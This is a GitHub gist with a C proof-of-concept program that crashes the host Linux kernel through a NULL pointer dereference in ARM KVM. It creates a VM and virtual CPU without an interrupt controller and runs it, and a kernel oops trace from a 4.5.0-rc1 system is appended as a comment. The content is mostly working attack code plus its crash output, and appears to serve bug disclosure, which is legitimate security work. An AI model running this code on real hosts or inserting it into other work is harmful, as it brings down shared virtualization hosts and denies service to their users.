Skip to content

Instantly share code, notes, and snippets.

@lgeek

lgeek/kvm_null_dereference_poc.c

Last active February 3, 2016 08:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lgeek/38552e6f7303ac8ce7eb to your computer and use it in GitHub Desktop.
Save lgeek/38552e6f7303ac8ce7eb to your computer and use it in GitHub Desktop.
Download ZIP
Raw
kvm_null_dereference_poc.c
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <assert.h>
#include <errno.h>
#include <linux/kvm.h>
#include <sys/ioctl.h>
int open_kvm() {
int ret;
int kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
if (kvm == -1) {
fprintf(stderr, "Failed to open the KVM device: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
ret = ioctl(kvm, KVM_GET_API_VERSION, NULL);
if (ret == -1) {
fprintf(stderr, "Failed to run KVM_GET_API_VERSION\n");
exit(EXIT_FAILURE);
} else if (ret != 12) {
fprintf(stderr, "KVM_GET_API_VERSION is %d, not 12", ret);
exit(EXIT_FAILURE);
}
return kvm;
}
int create_vgic(int vmfd) {
int ret;
ret = ioctl(vmfd, KVM_CREATE_IRQCHIP, NULL);
if (ret != 0) return -1;
struct kvm_arm_device_addr vgic_addr = {
.id = KVM_VGIC_V2_ADDR_TYPE_DIST | (KVM_ARM_DEVICE_VGIC_V2 << KVM_ARM_DEVICE_ID_SHIFT),
.addr = 0x10000000,
};
ret = ioctl(vmfd, KVM_ARM_SET_DEVICE_ADDR, &vgic_addr);
if (ret != 0) {
printf("%d, %s\n", errno, strerror(errno));
return -1;
}
vgic_addr.id = KVM_VGIC_V2_ADDR_TYPE_CPU | (KVM_ARM_DEVICE_VGIC_V2 << KVM_ARM_DEVICE_ID_SHIFT);
vgic_addr.addr = 0x10001000;
ret = ioctl(vmfd, KVM_ARM_SET_DEVICE_ADDR, &vgic_addr);
if (ret != 0) {
printf("%d, %s\n", errno, strerror(errno));
return -1;
}
return 0;
}
int main(int argc, char **argv) {
int ret, vmfd, kvm, vcpufd;
struct kvm_run *run;
kvm = open_kvm();
vmfd = ioctl(kvm, KVM_CREATE_VM, (unsigned long)0);
assert(vmfd != -1);
vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, (unsigned long)0);
assert(vcpufd != -1);
struct kvm_vcpu_init cpu_init;
ret = ioctl(vmfd, KVM_ARM_PREFERRED_TARGET, &cpu_init);
assert(ret == 0);
ret = ioctl(vcpufd, KVM_ARM_VCPU_INIT, &cpu_init);
assert(ret == 0);
// No kernel crash is this is enabled
#if 0
if (create_vgic(vmfd) != 0) {
exit(EXIT_FAILURE);
}
#endif
printf("starting the VM\n");
ret = ioctl(vcpufd, KVM_RUN, NULL);
printf("returned\n");
return 0;
}
/* Kernel null pointer dereference:
[ 3969.666334] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 3969.674518] pgd = ed6c2800
[ 3969.677226] [00000000] *pgd=6ea55003, *pmd=7f40c003
[ 3969.682286] Internal error: Oops: 207 [#8] SMP ARM
[ 3969.687072] Modules linked in:
[ 3969.690140] CPU: 0 PID: 896 Comm: poc Tainted: G D 4.5.0-rc1 #2
[ 3969.697177] Hardware name: Allwinner sun7i (A20) Family
[ 3969.702396] task: eeb4b9c0 ti: edff6000 task.ti: edff6000
[ 3969.707797] PC is at vgic_bitmap_get_irq_val+0x44/0x54
[ 3969.712930] LR is at kvm_vgic_map_is_active+0x94/0xa4
[ 3969.717976] pc : [<c001d704>] lr : [<c001e908>] psr: 200f0013
sp : edff7e50 ip : 00000180 fp : 00000000
[ 3969.729435] r10: 6d000000 r9 : c06360c0 r8 : ed083000
[ 3969.734652] r7 : 00000001 r6 : ed6c2f50 r5 : ed010000 r4 : ed010000
[ 3969.741169] r3 : 00000000 r2 : 0000001b r1 : 00000000 r0 : 00000000
[ 3969.747689] Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 3969.754813] Control: 30c5387d Table: 6d6c2800 DAC: fffffffd
[ 3969.760551] Process poc (pid: 896, stack limit = 0xedff6210)
[ 3969.766202] Stack: (0xedff7e50 to 0xedff8000)
[ 3969.770555] 7e40: f5257d14 00000001 00000000 00000000
[ 3969.778724] 7e60: 02e99769 ed010000 c0606230 ed4fcc00 00000001 c0021cf4 ed010000 c0016f60
[ 3969.786892] 7e80: ef7d1ac0 c0602410 00000000 000d0000 00000000 00ff0000 ef7d1a80 c00622f8
[ 3969.795060] 7ea0: c027809c c0067f60 00000004 eeb17400 ec80ea80 b6f0f010 eeb17400 ed010000
[ 3969.803228] 7ec0: 00000000 00000000 eeafcb40 00000000 edff6000 00000000 eec06000 c0011fe8
[ 3969.811396] 7ee0: 00000010 00000010 b6f0f000 00000000 00000000 c00f9af8 eeb4b9c0 edff7fb0
[ 3969.819564] 7f00: eeafcb40 eeafcb40 0000ae80 00000000 eeafcb40 c010a42c ee82e018 ef7d1a80
[ 3969.827732] 7f20: eeb4b9c0 00000000 ee8ed500 ef22f9c0 c0602630 c05fea80 edff7f8c c043f094
[ 3969.835899] 7f40: 00000000 00000002 ed08e848 00000000 00000000 c00fa8b0 00000000 c043f494
[ 3969.844067] 7f60: 00000000 2f1d3000 00000000 eeafcb40 eeafcb40 0000ae80 00000000 00000005
[ 3969.852235] 7f80: edff6000 00000000 00000000 c010aba4 00000000 b6ee7000 000000d8 00000036
[ 3969.860403] 7fa0: c00224e4 c0022340 00000000 b6ee7000 00000005 0000ae80 00000000 00000000
[ 3969.868571] 7fc0: 00000000 b6ee7000 000000d8 00000036 00000000 00000000 b6f13000 00000000
[ 3969.876739] 7fe0: 00020ac0 be8796dc 00010811 b6e8b036 600f0030 00000005 00000000 00000000
[ 3969.884918] [<c001d704>] (vgic_bitmap_get_irq_val) from [<c001e908>] (kvm_vgic_map_is_active+0x94/0xa4)
[ 3969.894307] [<c001e908>] (kvm_vgic_map_is_active) from [<c0021cf4>] (kvm_timer_flush_hwstate+0x60/0x70)
[ 3969.903693] [<c0021cf4>] (kvm_timer_flush_hwstate) from [<c0016f60>] (kvm_arch_vcpu_ioctl_run+0x10c/0x454)
[ 3969.913341] [<c0016f60>] (kvm_arch_vcpu_ioctl_run) from [<c0011fe8>] (kvm_vcpu_ioctl+0x390/0x6e8)
[ 3969.922210] [<c0011fe8>] (kvm_vcpu_ioctl) from [<c010a42c>] (do_vfs_ioctl+0x98/0x7dc)
[ 3969.930036] [<c010a42c>] (do_vfs_ioctl) from [<c010aba4>] (SyS_ioctl+0x34/0x5c)
[ 3969.937339] [<c010aba4>] (SyS_ioctl) from [<c0022340>] (ret_fast_syscall+0x0/0x34)
[ 3969.944901] Code: a1a03002 e202201f e0801101 e1a032c3 (e7910103)
[ 3969.951062] ---[ end trace 4d46a24f1045df69 ]---
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment